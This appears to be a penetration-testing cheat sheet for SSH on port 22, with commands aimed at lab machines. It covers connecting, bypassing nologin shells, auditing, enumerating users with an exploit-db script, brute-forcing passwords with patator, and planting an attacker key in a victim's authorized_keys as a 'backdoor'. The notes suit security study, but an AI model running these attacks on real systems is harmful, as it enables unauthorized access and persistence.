Port 22 - SSH
Connection
ssh root@192.168.142.154 # password
ssh -i root_key root@192.168.142.154 # public/privatekey
# troubleshooting - v: verbose
ssh -v 192.168.1.94
# bypass /usr/bin/nologin or /usr/bin/false
ssh -v noraj@192.168.1.94 /bin/bash
# Force auth method
ssh -v 192.168.1.94 -o PreferredAuthentications=password
# Disable Strick Host Key check
ssh -v -o StrictHostKeychecking=no -i id_rsa <user>@<ip>
# When attempting to SSH, the SSH client displays "Unable to negotiate with <IP address> port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1"
ssh j0hn@10.11.1.252 -p 22 -oKexAlgorithms=+diffie-hellman-group1-sha1
SSH Audit
# When you need to debug and understand what is going on SSH connection wit hconfiguration, run the following command. This is bit old.
https://github.com/arthepsy/ssh-audit
ssh-audit 192.168.1.94
SSH Keys
id_rsa # private key
id_rsa.pub # public key
Authorized_key # a list of public keys stored in server
User Enumeration
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Brute-foce SSH password
patator ssh_login host=sunday.htb port=22 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0
SSH Backdoor
# Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy
# Victim
echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys
# Connect
ssh -i <FILENAME> <USER>@<IP>
Services to stop and start
# Enable the service
sudo systemctl enable ssh
# Start and restart the service
sudo service ssh status
sudo service ssh restart
# Another way to start the service
sudo systemctl start ssh
# Find a SSH process
sudo ss -antlp | grep sshd
Last updated